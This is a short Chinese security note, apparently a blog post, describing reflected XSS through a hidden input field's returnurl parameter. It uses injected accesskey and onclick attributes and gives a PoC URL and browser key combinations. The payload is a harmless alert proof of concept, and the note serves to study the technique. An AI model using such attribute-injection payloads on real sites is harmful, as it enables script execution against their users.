今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:
<input type="hidden" name="returnurl" value="[USER INJECT]" />正常情况下的XSS应当是:
http://victim/?value=” onclick=”alert(document.domain)
但是这里由于该input 未在页面中显示,常用的onclick 方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫accesskey 于是乎构造:
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />PoC为:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
触发方法不同的浏览器不同,下面是w3school的总结:
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)